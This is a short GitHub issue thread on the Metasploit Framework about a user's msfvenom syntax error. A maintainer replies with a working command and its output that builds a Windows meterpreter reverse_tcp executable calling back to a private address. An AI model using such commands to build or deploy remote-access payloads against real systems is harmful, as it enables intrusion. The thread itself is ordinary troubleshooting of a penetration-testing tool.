### ISSUE TITLE
-f (--format) not working on msfvenom syntax command:

### ISSUE THREAD

**Issue by coolguy7890** [rapid7/metasploit-framework#15823]
trying to setup my first meterpreter session

when writing the following syntax i get an error:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 LHOST= xxx.xxx.xxx.xx LPORT=4444 -f exe -o payload.exe

-f is highslighted red pls help, any help would be greatly appreciated

**Comment by bcoles** [comment]
> when writing the following syntax i get an error:

What is the error?

$ ./msfvenom -p windows/meterpreter/reverse_tcp -a x86 LHOST=172.16.191.192 LPORT=4444 -f exe -o payload.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: payload.exe


$ file payload.exe 
payload.exe: PE32 executable (GUI) Intel 80386, for MS Windows
```
